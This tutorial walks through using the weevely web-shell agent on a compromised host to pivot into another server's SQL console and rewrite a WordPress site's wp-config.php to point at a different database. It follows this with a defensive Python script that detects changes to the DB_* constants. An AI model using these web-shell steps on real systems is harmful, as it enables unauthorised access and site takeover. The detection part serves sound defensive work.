Edit db and code of a web app
This tutorial shows how to browse a database and edit PHP scripts by pivoting on a target whose strongly limited environment does not allow executing shell commands.
The aim is to reconfigure WordPress installed on the target machine to use a new database, wordpress2, hosted on the server target2.
- Example PHP configuration:
  disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
- Used modules: sql_console, pico (file_edit), gedit (file_edit)
First of all, we check the accessibility and the credentials of the new database. Please note that the connection to target2 is made by pivoting on the target host, as if it were a standard ssh/telnet connection.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> :sql_console -user usr2 -passwd pwd2 -host target2
usr2@target2 SQL> show databases;
+--------------------+
| information_schema |
| wordpress2 |
| test |
+--------------------+
usr2@target2 SQL> show tables in wordpress2;
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------+
usr2@target2 SQL> ^DModule 'sql_console' execution terminated
www-data@target:/var/www PHP>
Now we're ready to replace the database information in the WordPress configuration file wp-config.php.
www-data@target:/var/www PHP> cd wordpress
www-data@target:/var/www/wordpress PHP> pico wp-config.php
Remote files can also be edited using a local graphical editor such as gedit:
www-data@target:/var/www/wordpress PHP> gedit wp-config.php
After saving the changes and closing the editor, the remote wp-config.php WordPress file is updated.
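Because disable_functions does not stop this kind of edit, the change is visible on the defending side as drift in the DB_* constants of wp-config.php. The following is an added example, not part of weevely or of the original page: it compares a known-good copy of the file with the current one and reports changed database settings. The function names and the baseline values are assumptions made for the illustration.

```python
import re

# Constants that decide which database WordPress talks to.
WATCHED = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")

# One left-to-right scan: define() calls with string literals first, then comments
# and stray strings, so a commented-out define is swallowed and never reported.
TOKEN = re.compile(r"""
    \bdefine\s*\(\s*(?P<q1>['"])(?P<key>\w+)(?P=q1)\s*,\s*
        (?P<q2>['"])(?P<val>(?:\\.|(?!(?P=q2)).)*)(?P=q2)\s*\)
  | /\*.*?\*/ | //[^\n]*|\#[^\n]*
  | '(?:\\.|[^'\\])*' | "(?:\\.|[^"\\])*"
""", re.S | re.X | re.I)


def db_settings(php_source):
    """Return the watched constants as PHP sees them (the first define() wins)."""
    found = {}
    for m in TOKEN.finditer(php_source):
        key = m.group("key")  # None when the token is a comment or stray string
        if key in WATCHED:
            found.setdefault(key, m.group("val"))
    return found


def drift(baseline_source, current_source):
    """Map each watched constant that changed to (baseline, current)."""
    old, new = db_settings(baseline_source), db_settings(current_source)
    return {k: (old.get(k), new.get(k)) for k in WATCHED if old.get(k) != new.get(k)}


# Constructed samples: the baseline values are invented; the modified values are
# the ones that appear in the tutorial's sql_console session.
BASELINE = """<?php
// define('DB_HOST', 'old-host');
define('DB_NAME', 'wordpress');
define('DB_USER', 'usr1');
define('DB_PASSWORD', 'pwd1');
define('DB_HOST', 'localhost');
"""
MODIFIED = (BASELINE.replace("'wordpress'", "'wordpress2'")
            .replace("'usr1'", "'usr2'").replace("'pwd1'", "'pwd2'")
            .replace("'localhost'", "'target2'"))

if __name__ == "__main__":
    for key, (old, new) in drift(BASELINE, MODIFIED).items():
        shown = "<changed>" if key == "DB_PASSWORD" else f"{old!r} -> {new!r}"
        print(f"ALERT wp-config.php {key}: {shown}")
```

Run from a location the web server user cannot write to, with the baseline stored off the host, so the comparison itself cannot be edited through the same channel.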